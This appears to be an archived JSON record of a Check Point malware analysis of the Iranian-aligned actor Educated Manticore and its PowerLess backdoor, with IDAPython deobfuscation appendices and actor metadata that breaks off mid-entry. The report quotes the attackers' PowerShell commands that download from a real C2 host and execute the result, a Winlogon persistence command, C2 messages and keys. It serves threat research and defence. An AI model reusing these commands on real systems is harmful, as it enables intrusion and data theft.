{
	"id": "077b6039-494c-4558-a620-00df04583f9a",
	"created_at": "2026-04-07T14:42:20.996533Z",
	"updated_at": "2026-04-10T03:36:00.851001Z",
	"deleted_at": null,
	"sha1_hash": "5ec3b3f1448dedc2380d507e89ff1ce32973c1ed",
	"title": "Educated Manticore – Iran Aligned Threat Actor Targeting Israel via Improved Arsenal of Tools",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 151553,
	"plain_text": "Educated Manticore – Iran Aligned Threat Actor Targeting Israel via Improved Arsenal of Tools\r\nBy etal\r\nPublished: 2023-04-25 · Archived: 2026-04-07 14:36:06 UTC\r\nKey Findings:\r\nIn this report we reveal new findings related to Educated Manticore, an activity cluster with strong overlap with Phosphorus, an Iranian-aligned threat actor operating in the Middle East and North America.\r\nLike many other actors, Educated Manticore has adopted recent trends and started using ISO images and possibly other archive files to initiate infection chains. In the report we reveal Iraq-themed lures, most likely used to target entities in Israel.\r\nThe actor has significantly improved its toolset, utilizing rarely seen techniques, most prominently .NET executables constructed as Mixed Mode Assembly – a mixture of .NET and native C++ code. This improves the tools’ functionality and makes their analysis more difficult.\r\nThe final executed payload is an updated version of the PowerLess implant, previously tied to some of Phosphorus’ ransomware operations.\r\nIntroduction\r\nIn this report, Check Point Research reveals new findings about an activity cluster closely related to Phosphorus. The research presents a new and improved infection chain leading to the deployment of a new version of PowerLess. This implant was attributed in the past to Phosphorus, an Iran-affiliated threat group operating in the Middle East and North America. Phosphorus has been linked to a wide variety of activities, ranging from ransomware to spear-phishing of high-profile individuals.\r\nWhile the new PowerLess payload remains similar, its loading mechanisms have significantly improved, adopting techniques rarely seen in the wild, such as using .NET binary files created in mixed mode with assembly code. 
The newly discovered version is likely intended for phishing attacks focused around Iraq, using an ISO file to initiate the infection chain. Other documents inside the ISO file were in Hebrew and Arabic, suggesting the lures were aimed at Israeli targets.\r\nAs the details of this attack were uncovered, two other, very similar lures drew our research team’s attention. Based on internal naming conventions and previous submissions, we assess with medium confidence that those lures were part of testing efforts by the same threat actor.\r\nCheck Point Research tracks this activity cluster as Educated Manticore.\r\nPowerLess Infection Chain Analysis\r\nHigh-level Overview\r\nEducated Manticore’s deployment of PowerLess is a multi-staged process that contains several custom components:\r\nLure (Iraq development resources.iso as well as the documents within it)\r\nInitial Loader (Iraq development resources.exe, later renamed to syscall01.exe)\r\nDownloader (stored encrypted within zoom.jpg)\r\nPowerLess Loader (syscall02.exe, downloaded by zoom.jpg)\r\nPowerLess Payload (stored encrypted within asdfg, downloaded by zoom.jpg)\r\nThe complete chain is depicted below:\r\nFigure 1 – High-level overview of Educated Manticore’s PowerLess infection chain\r\nhttps://research.checkpoint.com/2023/educated-manticore-iran-aligned-threat-actor-targeting-israel-via-improved-arsenal-of-tools/\r\nPage 1 of 14\n\nISO and Lures\r\nThe file Iraq development resources.iso was submitted to VirusTotal by two submitters from Israeli IP addresses. At the time of this writing, it has 0 detections, possibly affected by its large size (18.5 MB). It is worth noting that the initial loader embedded in the ISO file also has a low detection rate.\r\nFigure 2 – ISO image detections on VirusTotal\r\nThe ISO file is designed to deceive the user. 
Its structure is unique, containing a relatively large number of files in three hidden folders whose names contain non-breaking spaces, in addition to the initial loader, which is disguised as a folder as well.\r\nA summary of the files in the ISO image:\r\nFigure 3 – Contents of ISO image\r\nOf the three folders, the first contains an encrypted version of a custom downloader stored as zoom.jpg. The second and third are identical in terms of subfolder and file names; one contains the actual PDF lures and the other contains the same files XORed with ‘0x0a’ in the decimal format. The lures are divided into subfolders by language, containing files in Arabic, English, and Hebrew. All of them are PDF files with academic content about Iraq, suggesting the targets might have been academic researchers.\r\nFigure 4 – PDF lures\r\nWhat might appear in the picture as a fourth folder is actually the initial loader, a PE file named Iraq development resources.exe that is disguised as an empty folder, prompting users to click it without noticing its extension.\r\nInitial Loader\r\nIraq development resources.exe is the first malicious component, initiating the infection chain upon execution. It is a 64-bit PE designed to decrypt and execute a custom downloader from the file zoom.jpg, which is also embedded in the ISO file, using the open-source project RunPE-In-Memory.\r\nThe initial loader itself is obfuscated, most likely with compiler-generated pattern-based obfuscation. In this case, the obfuscation resulted in about 1282 blocks full of junk code. 
Appendix “A” provides a dedicated IDAPython script we created to de-obfuscate the code.\r\nFigure 5 – Comparison between code flow before and after de-obfuscation\r\nTo make the analysis even more difficult, the actors have implemented an additional layer of 13 customized string-decryption functions based on TEA32 (Tiny Encryption Algorithm), where each function uses a different decryption key and is implemented to work on a certain length of string. Appendix “B” provides a dedicated IDAPython script we created to decrypt the code.\r\nUpon execution, the initial loader:\r\n1. Creates the directory C:\\Users\\User\\AppData\\Local\\SystemCall.\r\n2. Copies itself with the name syscall01.exe to the above folder. The malware also attempts to copy zoom.jpg to the same folder, but fails because of improper handling of spaces.\r\n3. Constructs the path to the file zoom.jpg, stored in a non-breaking space folder ( \\\\\\xA0 ) in the ISO image, as depicted below:\r\nFigure 6 – Invoking zoom.jpg in memory using RunPE-In-Memory\r\n4. Decrypts the contents of the downloader to memory from zoom.jpg using AES-256-CBC with the key qweasdzxcrtyfghvqweasdzxcrtyfghv and IV ddssajliodqsdedw. 
The decryption is implemented in a custom version of RunPE-In-Memory, built to handle the encrypted payload, map it to memory, and execute it at its entry point, as seen below, compared to the original project code.\r\nFigure 7 – Comparison between publicly available RunPE-In-Memory and Educated Manticore version\r\nDownloader\r\nThe decrypted file extracted from zoom.jpg is a 64-bit PE whose main purpose is downloading and executing the next stages. The downloader is obfuscated similarly to the initial loader, affected by the same compiler-generated pattern-based obfuscation, and can also be de-obfuscated with the script provided in Appendix “A”. The string decryption is also implemented similarly, but this time using 16 different customized string-decryption functions based on TEA32 (Tiny Encryption Algorithm).\r\nAfter it is loaded into memory and run, the downloader:\r\n1. Starts Explorer in one of the “iso” subfolders, imitating a real folder opening.\r\n2. Creates persistence for syscall01.exe (the newly created copy of the initial loader) by setting the registry value HKCU\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell. The persistence is configured only if the malware does not run from the AppData directory and if syscall01.exe does not exist in the folder C:\\Users\\User\\AppData\\Local\\SystemCall. In the flow described above, this persistence is not configured, because syscall01.exe was created in a previous stage in exactly that folder, indicating a possibly different execution-flow use case for this downloader.\r\n3. 
Downloads the PowerLess loader through a POST request to an attacker-controlled domain, https://subinfralab[.]info/qaMspFbEmg, saving the file as C:\\Users\\User\\AppData\\Local\\SystemCall\\syscall02.exe.\r\n4. Downloads the encrypted PowerShell payload content through a POST request to the same server, https://subinfralab[.]info/hgAdDiLmnB, saving it as C:\\Users\\Public\\asdfg.\r\nFigure 8 – Payload downloaded from attacker-controlled domain\r\n5. Executes the PowerLess loader through the command explorer C:\\Users\\User\\AppData\\Local\\SystemCall\\syscall02.exe.\r\nPowerLess Loader\r\nThe downloaded executable file syscall02.exe, dubbed the “PowerLess Loader”, is a 64-bit .NET PE constructed as a Mixed Mode Assembly. It is designed to load the encrypted PowerShell script backdoor asdfg, dubbed the “PowerLess Payload”, decrypt it, and invoke it in memory. In addition, it performs a few evasion techniques, such as AMSI bypass and ETW bypass.\r\nRight upon the first inspection of the PE structure, a few characteristics point to this .NET sample being constructed as a Mixed-Mode Assembly. The “IL Only” flag inside the .NET directory flags is not checked. This means that the sample could contain not only IL code, but also unmanaged code. In addition, the Import Directory contains a set of entries for native libraries.\r\nFigure 9 – Inspection of unique .NET elements – “IL Only” flag not checked and imported native libraries\r\nReverse-engineering mixed-mode assembly code differs from pure .NET assembly code, requiring both native and IL code disassemblers. The native CRT entry point mainCRTStartup() redirects execution back to the managed code – directly to the method main(), where all logic resides. 
The construction of certain strings is the first logic observed in this method. Recreating these strings reveals functionality related to the AMSI bypass and ETW bypass evasion techniques, as well as keys and paths required to invoke the PowerLess payload later.\r\nFigure 10 – Reconstruction of AMSI and ETW bypass related strings\r\nFollowing the execution of the bypasses mentioned above, the loader reads the contents of the file stored in C:\\Users\\Public\\asdfg, previously downloaded by the downloader. For the decryption, AES-128-ECB with the previously constructed key {}nj45kdada0slfk is used. Once the PowerLess Payload asdfg is decrypted, it is executed in memory in the context of syscall02.exe, using an instance of the class System.Management.Automation.PowerShell and the applicable methods.\r\nFigure 11 – Invocation of PowerShell payload extracted from the file C:\\Users\\Public\\asdfg\r\nPowerLess Payload\r\nThe final payload is a new version of the previously reported PowerLess PowerShell payload. This version, however, is more mature, supporting a much wider set of commands. It contains an internal configuration, including its Command and Control server (C\u0026C), using the previously mentioned attacker-owned domain subinfralab[.]info.\r\nFigure 12 – PowerLess configuration\r\nA short inspection of the supported commands in the newer version, in comparison to those in the previously reported sample, provides insight into the significant development the payload has gone through. 
Among the new features are showing the list of installed programs, showing the list of processes, showing a list of files, stealing user data from the Telegram desktop app, and taking screenshots.\r\nPrevious Version: Browser, Command, Download, Kill, Operation\r\nCurrent Version: Browser, Command, Download, Index, Multi, Operation, Proc, Prog, Shot, Sound, Tele, update, Upload\r\nAmong its capabilities, PowerLess can download extra modules, including a keylogger, a browser information stealer, and a surroundings sound recorder. Previous reports have linked a similar sound recording tool to the PowerLess actors, but since then they have embedded it within the malware and activate it upon the “sound” command from the C\u0026C server. The tool is downloaded from the server and saved as C:\\Windows\\temp\\ugt\\so.zip.\r\nFigure 13 – Newly embedded “sound” command as seen in PowerLess payload\r\nPowerLess C\u0026C communication with the server is Base64-encoded and encrypted after obtaining a key from the server. 
To mislead researchers, the threat actor adds three random letters at the beginning of the encoded blob.\r\nThe backdoor starts by initiating a request to receive the communication encryption key from the C\u0026C server:\r\n{\"BotId\":\"1D1FB0BB21B94FC0B017A4DADA231E17\",\"GroupName\":\"SLM\",\"type\":\"fetchkey\"}\r\nIn response, the C\u0026C server sends a key and a “first-time” flag:\r\n{ \"Key\" : \"X9w4tpLJErwNCKYA\", \"first\" : \"1\" }\r\nIn the first run, the PowerShell backdoor enumerates the system and sends recon data nested in “info”, including the computer name, username, operating system, IP address, installation path, computer manufacturer, and installed security software:\r\n{\"BotId\":\"1D1FB0BB21B94FC0B017A4DADA231E17\", \"type\":\"sendinfos\", \"info\":\u003cEncrypted and encoded information in the JSON format\u003e}\r\nIn addition, the backdoor sends the list of processes and programs from the victim’s computer. 
After sending the relevant information, the backdoor begins to check periodically, every 48 to 72 seconds, for commands from the C\u0026C server using the fetchcommand request:\r\n{\"type\":\"fetchcommand\",\"BotId\":\"1D1FB0BB21B94FC0B017A4DADA231E17\"}\r\nThe first command received from the C\u0026C server achieves persistence on the victim’s computer by adding the value Shell with the data syscall02.exe to the Winlogon registry key. The persistence command is followed by a command to get logical disk names. The commands, separated by **, are sent immediately after the connection is established, which leads us to believe that it is an automated process:\r\n{\"Cid\" : \"29\" , \"Command\" : \"reg add 'hkcu\\software\\microsoft\\windows NT\\currentversion\\winlogon' /v 'Shell' /d 'explorer.exe, C:\\Users\\admin\\AppData\\Local\\SystemCall\\syscall02.exe' -f\" , \"CommandType\" :\"Command\"}\r\n{\"Cid\" : \"30\" , \"Command\" : \"wmic logicaldisk get name\" , \"CommandType\" :\"Command\"}\r\nThe Educated Manticore Apprentice\r\nWhile analyzing the newly discovered PowerLess lures, the CPR team came across a different intrusion set that shares several characteristics with the attack chain described above. This intrusion set consists of two archive files:\r\n1. iraq-project.rar contains the LNK file Iraq-project.lnk and the folder Other-files. This folder contains several PDF files with an Iraq-related theme and a DLL file stored as a fake JPG file.\r\n2. SignedAgreement.zip contains an LNK file, SignedAgreement.lnk.\r\nFigure 14 – Summary of two suspicious infection chains\r\nAlthough there is no clear technical overlap between the PowerLess activity and this intrusion set with the two archive files, they are likely related. Among the similarities between the two intrusion sets:\r\nBoth intrusion sets are themed around Iraq and utilize the same PDF file, contained in the archives and in the ISO image – Governance_and_Development_in_Iraq.pdf.\r\nTwo different submitters, both from Israel, submitted files related to the ISO and the archives intrusion sets in close proximity, indicating that the two submitters had access to both sets.\r\nBoth campaigns utilize the open-source project RunPE-In-Memory.\r\nIt is evident that the second campaign is incomplete and might have been part of a personal project conducted by its developer, as indicated by the PDB path D:\\Personal Cmp\\personal project\\WorkSpace\\PROJREV\\aa\\ that appears in some of the samples. 
It is likely that this “personal project” was developed in the same context as the PowerLess lure described above and might have taken inspiration from it or influenced it.\r\nInfection Chain – iraq-project.rar\r\nThe LNK file stored in the RAR archive executes a PowerShell script that extracts the XORed PE file from the LNK file and runs it. This PE file then downloads two files from the C\u0026C server. At the time of our analysis, the payloads were no longer available for download. Other artifacts retrieved throughout the analysis of the second lure, SignedAgreement.zip, as well as additional files found on VirusTotal, lead us to believe that one downloaded file is the backdoor, while the second file is used to run it in memory.\r\nLNK Analysis\r\nClicking the malicious LNK file triggers a PowerShell script that extracts a PE file embedded within it, saving it to the %temp% folder. The script then executes the extracted file. Additionally, the file Governance_and_Development_in_Iraq.jpg is saved to the %temp% folder as Newtonsoft.Json.dll:\r\n$lnkpath = Get-ChildItem *.lnk | where-object {$_.length -eq 0x00005A54} | Select-Object -ExpandProperty Name; $file = gc $lnkpath -Encoding Byte; for($i=0; $i -lt $file.count; $i++) { $file[$i] = $file[$i] -bxor 0x77 }; $path = 'C:\\Users\\admin\\AppData\\Local\\Temp\\tmp' + (Get-Random) + '.exe'; sc $path ([byte[]]($file | select -Skip 003156)) -Encoding Byte; $bytes2 = gc .\\Other-files\\Governance_and_Development_in_Iraq.jpg -Encoding Byte; $path2 = 'C:\\Users\\admin\\AppData\\Local\\Temp\\' + 'Newtonsoft.Json' + '.dll'; sc $path2 ([byte[]]($bytes2)) -Encoding Byte; \u0026 $path;\r\ntmp1940166302.exe\r\ntmp1940166302.exe runs a PowerShell script to download two files from the C\u0026C server and executes them. It is worth noting that the file names change randomly with each run of the EXE.\r\n/c powershell -WindowStyle hidden $path = 'C:\\Users\\User\\AppData\\Local\\Temp\\s6b4.0.pdf'; $wc = New-Object System.Net.WebClient; $bytes = $wc.DownloadData('https://deersharpfork.info/dw85fgxtvzq/download/i/34624051816246d4a1a7f225d966d139/7e58169ee59d46e7a2be023e7\r\nsc $path ([byte[]]($bytes)) -Encoding Byte; \u0026 C:\\Users\\User\\AppData\\Local\\Temp\\s6b4.0.pdf\r\n/c powershell -WindowStyle hidden $path = 'C:\\Users\\User\\AppData\\Local\\Temp\\s6b4.1.exe'; $wc = New-Object System.Net.WebClient; $bytes = $wc.DownloadData('https://deersharpfork.info/dw85fgxtvzq/download/f/bb14611f7aae441fb78f2ca919b800b5/7e58169ee59d46e7a2be023e72\r\nfor($i = 0; $i -lt $bytes.count; $i++) {$bytes[$i] = $bytes[$i] -bxor 0x25 }; sc $path ([byte[]]($bytes)) -Encoding Byte; ^\u0026 C:\\Users\\User\\AppData\\Local\\Temp\\s6b4.1.exe;\r\nThe file PDB path suggests it might have been part of a personal project: D:\\Personal Cmp\\personal project\\WorkSpace\\PROJREV\\aa\\ImageLoderFinal\\x64\\Release\\ImageLoderFinal.pdb.\r\nPivoting from this path, three additional samples surfaced, all named AgentFinal.exe. These samples were all uploaded to VirusTotal on the same day and are different versions of the same payload. The payload seems to be a relatively immature version of an implant, only capable of communicating with the C\u0026C server and executing commands.\r\nThe domain used in the payload, blackturtle.hopto[.]org, resolves to the same IP address as the domain deersharpfork[.]info that was used in the infection chain. 
Furthermore, the AgentFinal.exe payload uses the Newtonsoft.Json.dll library from the original archive.\r\nBased on this information, it is likely that the final payload in this infection chain is a .NET payload with capabilities similar to those of AgentFinal.exe.\r\nSignedAgreement.zip\r\nThe additional archive found closely resembles Iraq-project.rar in terms of its infection chain and implementation, the only exception being the use of a DLL file instead of an EXE file. Nevertheless, both PE files have the same objective of downloading two files from the C\u0026C server.\r\nSimilar to Iraq-project.rar, the final payloads for this infection chain were not available at the time of our analysis. However, one of the downloaded files, wmaess.exe, was submitted to VirusTotal. This file is utilized to run the PE file in memory. When executed by the DLL, it receives the second file downloaded from the C\u0026C server, WinMAPI.exe, as an argument.\r\nThe samples within this archive reach out to the same C\u0026C server – deersharpfork[.]info.\r\nAttribution\r\nSince 2021, a new cluster of activity with clear ties to Iran has caught the attention of the threat intelligence community. The aggressive nature of the new threat, in combination with its ties to ransomware deployments, led to a thorough analysis of its activities. It was commonly called Nemesis Kitten, TunnelVision or Cobalt Mirage.\r\nWhat started as an extremely loud campaign, targeting networks opportunistically, was soon exposed as tied to previously reported Iranian threat actors, most prominently those who align to some extent with APT35, Charming Kitten, or Phosphorus. Although different in nature and targeting, it shared some characteristics with the well-known actors, including infrastructure, indicating a possible common organizational affiliation.\r\nAs the activity evolved, the ties between the different clusters became harder to untangle. 
While the two ends of the spectrum of those activities differ significantly, the threat intelligence community has more than once stumbled upon an activity that does not easily fit the known clusters. Our previous report described one of those samples and the overlaps between the Log4J exploitation activity and an Android app previously tied to APT35.\r\nBecause we have insufficient knowledge to place the activities around the PowerLess backdoor in this complex puzzle, we have decided to track this activity separately, based on a new naming convention adopted by Check Point Research. According to the new convention, which labels threats as mythical creatures, Iranian-aligned threats are Manticores. Because the lures in the activity described in this report were academic in nature, and because overlapping activities often pursue similar targets, we have decided to name this actor Educated Manticore.\r\nConclusion\r\nIn this report, we analyzed newly discovered infection chains attributed to Educated Manticore, a threat actor aligned with Iranian state interests. Based on Check Point Research observations, as demonstrated in this report, Educated Manticore continues to evolve, refining previously observed toolsets and delivery mechanisms.\r\nAnalysis of the new PowerLess variant suggests the actor adopts popular trends to avoid detection, such as using archive files and ISO images. In parallel to adopting these trends, they keep developing custom toolsets using advanced techniques, such as .NET binaries using Mixed Mode Assembly.\r\nThe variant described in this report was delivered using ISO files, indicating it is likely meant to be the initial infection vector. 
Because it is an updated version of the previously reported malware PowerLess, associated with some of Phosphorus’ ransomware operations, it is important to note that it might only represent the early stages of infection, with significant fractions of post-infection activity yet to be seen in the wild.\r\nCheck Point customers remain protected against the threat described in this research.\r\nCheck Point Threat Emulation provides comprehensive coverage of attack tactics, file types, and operating systems. Harmony Endpoint provides comprehensive endpoint protection at the highest security level, crucial to avoid security breaches and data compromise.\r\nIOCs\r\nC\u0026C domains\r\nsubinfralab[.]info\r\ndeersharpfork[.]info\r\nblackturtle.hopto[.]org\r\nHashes\r\nAppendix A – IDAPython script to de-obfuscate the Educated Manticore binary files\r\nimport idaapi, idc, idautils\r\n\r\n\r\ndef NopRange(startEa, endEa):\r\n    # Overwrite every byte of a junk basic block with NOP (0x90)\r\n    for b in range(startEa, endEa):\r\n        idc.patch_byte(b, 0x90)\r\n\r\n\r\ndef DetectJunkBB(bb: idaapi.BasicBlock):\r\n    # A basic block is junk if one of its instructions uses the 32-bit\r\n    # immediate 0x9e3779b9 (the TEA delta constant the obfuscator embeds).\r\n    # Successor blocks that contain no call are junk as well.\r\n    global BBJunkCount\r\n    global BBsJunk\r\n    for head in idautils.Heads(bb.start_ea, bb.end_ea):\r\n        if (idc.get_operand_type(head, 1) == idc.o_imm and\r\n                (idc.get_operand_value(head, 1) \u0026 0xffffffff) == 0x9e3779b9):\r\n            BBsJunk.append(bb)\r\n            BBJunkCount += 1\r\n            for bbSS in bb.succs():\r\n                if bbSS.start_ea == bb.start_ea:\r\n                    continue\r\n                if not [SShead for SShead in idautils.Heads(bbSS.start_ea, bbSS.end_ea)\r\n                        if idc.print_insn_mnem(SShead) == \"call\"]:\r\n                    BBsJunk.append(bbSS)\r\n                    BBJunkCount += 1\r\n            # One marker instruction is enough; do not count the block twice\r\n            return\r\n\r\n\r\nBBJunkCount = 0\r\nBBsJunk = []\r\n\r\n# Walk the flow chart of every function and collect junk basic blocks\r\nfuncs = idautils.Functions()\r\nfor funcAddr in funcs:\r\n    func = idaapi.get_func(funcAddr)\r\n    fChart = idaapi.FlowChart(func, None, idaapi.FC_PREDS | idaapi.FC_NOEXT)\r\n    for bb in fChart:\r\n        DetectJunkBB(bb)\r\n\r\n# Patch the collected blocks out of the database\r\nfor bb in BBsJunk:\r\n    NopRange(bb.start_ea, bb.end_ea)\r\nprint(\"Cleaned BBs with JUNK code: %d\" % (BBJunkCount))
bbSS in bb.succs():\r\n if(bbSS.start_ea == bb.start_ea):\r\n continue\r\n \r\n if (not [SShead for SShead in idautils.Heads(bbSS.start_ea, bbSS.end_ea) if idc.print_insn_mne\r\n BBsJunk.append(bbSS)\r\n BBJunkCount += 1\r\n return\r\nBBJunkCount = 0\r\nBBsJunk = []\r\nfuncs = idautils.Functions()\r\nfor funcAddr in funcs:\r\n func = idaapi.get_func(funcAddr)\r\n fChart = idaapi.FlowChart(func, None, idaapi.FC_PREDS | idaapi.FC_NOEXT)\r\n for bb in fChart:\r\n DetectJunkBB(bb)\r\nfor bb in BBsJunk:\r\n NopRange(bb.start_ea, bb.end_ea)\r\nprint(\"Cleaned BBs with JUNK code: %d\" % (BBJunkCount))\r\nAppendix B – IDAPython script to decrypt the Educated Manticore binary strings\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nimport idaapi, idc, idautils\r\n# \"return False\" in condition - indicates not to break on BP, if \"return True\" the BP will break -\u003e use False just for logging\r\ncond = \"\"\"import idc\r\nRAX = idc.get_reg_value(\"rax\")\r\nRIP = idc.get_reg_value(\"rip\")\r\ndecString = idc.get_strlit_contents(RAX,-1, idc.STRTYPE_C16)\r\nif decString == None:\r\ndecString = idc.get_strlit_contents(RAX,-1, idc.STRTYPE_C)\r\nprint(\"Decrypted String: %s Address:0x%x\" % (decString ,RIP))\r\nidc.set_cmt(RIP, str(decString), False)\r\nhttps://research.checkpoint.com/2023/educated-manticore-iran-aligned-threat-actor-targeting-israel-via-improved-arsenal-of-tools/\r\nPage 11 of 14\n\nloc = RIP\r\ncomment = str(decString)\r\ncfunc = idaapi.decompile(loc)\r\neamap = cfunc.get_eamap()\r\ndecompObjAddr = eamap[loc][0].ea\r\ntl = idaapi.treeloc_t()\r\ntl.ea = decompObjAddr\r\ncommentSet = False\r\nfor itp in range (idaapi.ITP_SEMI, idaapi.ITP_COLON):#range to cover different ending - orphans cmts\r\ntl.itp = itp\r\ncfunc.set_user_cmt(tl, comment)\r\ncfunc.save_user_cmts()\r\nunused = cfunc.__str__()\r\nif not cfunc.has_orphan_cmts():\r\ncommentSet = 
True\r\ncfunc.save_user_cmts()\r\nbreak\r\ncfunc.del_orphan_cmts()\r\nif not commentSet:\r\nprint (\"pseudo comment error at %08x\" % loc)\r\nreturn False\r\n\"\"\"\r\ndecryptionFunctions = [0x14000C650, 0x14000C770, 0x14000C890, 0x14000C9A0, 0x14000CAC0, 0x14002B010,\r\n0x14002B130, 0x14002B250, 0x14002B4F0, 0x14002B5E0, 0x14002B700, 0x140035200, 0x140035320]\r\nfor decFunc in decryptionFunctions:\r\ncodeRefs = idautils.CodeRefsTo(decFunc,1)\r\nfor ref in codeRefs:\r\nea = idc.next_head(ref)\r\nidaapi.add_bpt(ea, 0, idaapi.BPT_SOFT)\r\nbpt = idaapi.bpt_t()\r\nidaapi.get_bpt(ea, bpt)\r\nbpt.elang = 'Python'\r\nbpt.condition = cond\r\nidaapi.update_bpt(bpt)\r\nhttps://research.checkpoint.com/2023/educated-manticore-iran-aligned-threat-actor-targeting-israel-via-improved-arsenal-of-tools/\r\nPage 12 of 14\n\nimport idaapi, idc, idautils # \"return False\" in condition - indicates not to break on BP, if \"return True\" the BP will break -\u003e\r\nuse False just for logging cond = \"\"\"import idc RAX = idc.get_reg_value(\"rax\") RIP = idc.get_reg_value(\"rip\") decString =\r\nidc.get_strlit_contents(RAX,-1, idc.STRTYPE_C16) if decString == None: decString = idc.get_strlit_contents(RAX,-1,\r\nidc.STRTYPE_C) print(\"Decrypted String: %s Address:0x%x\" % (decString ,RIP)) idc.set_cmt(RIP, str(decString), False)\r\nloc = RIP comment = str(decString) cfunc = idaapi.decompile(loc) eamap = cfunc.get_eamap() decompObjAddr =\r\neamap[loc][0].ea tl = idaapi.treeloc_t() tl.ea = decompObjAddr commentSet = False for itp in range (idaapi.ITP_SEMI,\r\nidaapi.ITP_COLON):#range to cover different ending - orphans cmts tl.itp = itp cfunc.set_user_cmt(tl, comment)\r\ncfunc.save_user_cmts() unused = cfunc.__str__() if not cfunc.has_orphan_cmts(): commentSet = True\r\ncfunc.save_user_cmts() break cfunc.del_orphan_cmts() if not commentSet: print (\"pseudo comment error at %08x\" % loc)\r\nreturn False \"\"\" decryptionFunctions = [0x14000C650, 0x14000C770, 0x14000C890, 0x14000C9A0, 
0x14000CAC0,\r\n0x14002B010, 0x14002B130, 0x14002B250, 0x14002B4F0, 0x14002B5E0, 0x14002B700, 0x140035200, 0x140035320]\r\nfor decFunc in decryptionFunctions: codeRefs = idautils.CodeRefsTo(decFunc,1) for ref in codeRefs: ea =\r\nidc.next_head(ref) idaapi.add_bpt(ea, 0, idaapi.BPT_SOFT) bpt = idaapi.bpt_t() idaapi.get_bpt(ea, bpt) bpt.elang = 'Python'\r\nbpt.condition = cond idaapi.update_bpt(bpt)\r\nimport idaapi, idc, idautils\r\n# \"return False\" in condition - indicates not to break on BP, if \"return True\" the BP will break -\u003e use False\r\ncond = \"\"\"import idc\r\nRAX = idc.get_reg_value(\"rax\")\r\nRIP = idc.get_reg_value(\"rip\")\r\ndecString = idc.get_strlit_contents(RAX,-1, idc.STRTYPE_C16)\r\nif decString == None:\r\n decString = idc.get_strlit_contents(RAX,-1, idc.STRTYPE_C)\r\nprint(\"Decrypted String: %s Address:0x%x\" % (decString ,RIP))\r\nidc.set_cmt(RIP, str(decString), False)\r\nloc = RIP\r\ncomment = str(decString)\r\ncfunc = idaapi.decompile(loc)\r\neamap = cfunc.get_eamap()\r\ndecompObjAddr = eamap[loc][0].ea\r\ntl = idaapi.treeloc_t()\r\ntl.ea = decompObjAddr\r\ncommentSet = False\r\nfor itp in range (idaapi.ITP_SEMI, idaapi.ITP_COLON):#range to cover different ending - orphans cmts\r\n tl.itp = itp\r\n cfunc.set_user_cmt(tl, comment)\r\n cfunc.save_user_cmts()\r\n unused = cfunc.__str__()\r\n if not cfunc.has_orphan_cmts():\r\n commentSet = True\r\n cfunc.save_user_cmts()\r\n break\r\n cfunc.del_orphan_cmts()\r\nif not commentSet:\r\n print (\"pseudo comment error at %08x\" % loc)\r\nreturn False\r\n\"\"\"\r\ndecryptionFunctions = [0x14000C650, 0x14000C770, 0x14000C890, 0x14000C9A0, 0x14000CAC0, 0x14002B010, 0x14002B1\r\nfor decFunc in decryptionFunctions:\r\n codeRefs = idautils.CodeRefsTo(decFunc,1)\r\n for ref in codeRefs:\r\n ea = idc.next_head(ref)\r\n idaapi.add_bpt(ea, 0, idaapi.BPT_SOFT)\r\n bpt = idaapi.bpt_t()\r\n idaapi.get_bpt(ea, bpt)\r\n bpt.elang = 'Python'\r\n bpt.condition = cond\r\n 
idaapi.update_bpt(bpt)\r\nhttps://research.checkpoint.com/2023/educated-manticore-iran-aligned-threat-actor-targeting-israel-via-improved-arsenal-of-tools/\r\nPage 13 of 14\n\nSource: https://research.checkpoint.com/2023/educated-manticore-iran-aligned-threat-actor-targeting-israel-via-improved-arsenal-of-tools/\r\nhttps://research.checkpoint.com/2023/educated-manticore-iran-aligned-threat-actor-targeting-israel-via-improved-arsenal-of-tools/\r\nPage 14 of 14",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA",
		"MISPGALAXY"
	],
	"references": [
		"https://research.checkpoint.com/2023/educated-manticore-iran-aligned-threat-actor-targeting-israel-via-improved-arsenal-of-tools/"
	],
	"report_names": [
		"educated-manticore-iran-aligned-threat-actor-targeting-israel-via-improved-arsenal-of-tools"
	],
	"threat_actors": [
		{
			"id": "82b92285-4588-48c9-8578-bb39f903cf62",
			"created_at": "2022-10-25T15:50:23.850506Z",
			"updated_at": "2026-04-10T02:00:05.418577Z",
			"deleted_at": null,
			"main_name": "Charming Kitten",
			"aliases": [
				"Charming Kitten"
			],
			"source_name": "MITRE:Charming Kitten",
			"tools": [
				"DownPaper"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d8af157e-741b-4933-bb4a-b78490951d97",
			"created_at": "2023-01-06T13:46:38.748929Z",
			"updated_at": "2026-04-10T02:00:03.087356Z",
			"deleted_at": null,
			"main_name": "APT35",
			"aliases": [
				"COBALT MIRAGE",
				"Agent Serpens",
				"Newscaster Team",
				"Magic Hound",
				"G0059",
				"Phosphorus",
				"Mint Sandstorm",
				"TunnelVision"
			],
			"source_name": "MISPGALAXY:APT35",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6b4a82e8-21f1-4bc7-84cf-e27334998b48",
			"created_at": "2022-10-25T16:07:23.84296Z",
			"updated_at": "2026-04-10T02:00:04.762229Z",
			"deleted_at": null,
			"main_name": "DEV-0270",
			"aliases": [
				"DEV-0270",
				"DireFate",
				"Lord Nemesis",
				"Nemesis Kitten",
				"Yellow Dev 23",
				"Yellow Dev 24"
			],
			"source_name": "ETDA:DEV-0270",
			"tools": [
				"Impacket",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"WmiExec"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "eaef3218-1f8c-4767-b1ff-da7a6662acc0",
			"created_at": "2023-03-04T02:01:54.110909Z",
			"updated_at": "2026-04-10T02:00:03.359871Z",
			"deleted_at": null,
			"main_name": "DEV-0270",
			"aliases": [
				"Nemesis Kitten",
				"Storm-0270"
			],
			"source_name": "MISPGALAXY:DEV-0270",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "029625d2-9734-44f9-9e10-b894b4f57f08",
			"created_at": "2023-01-06T13:46:38.364105Z",
			"updated_at": "2026-04-10T02:00:02.944092Z",
			"deleted_at": null,
			"main_name": "Charming Kitten",
			"aliases": [
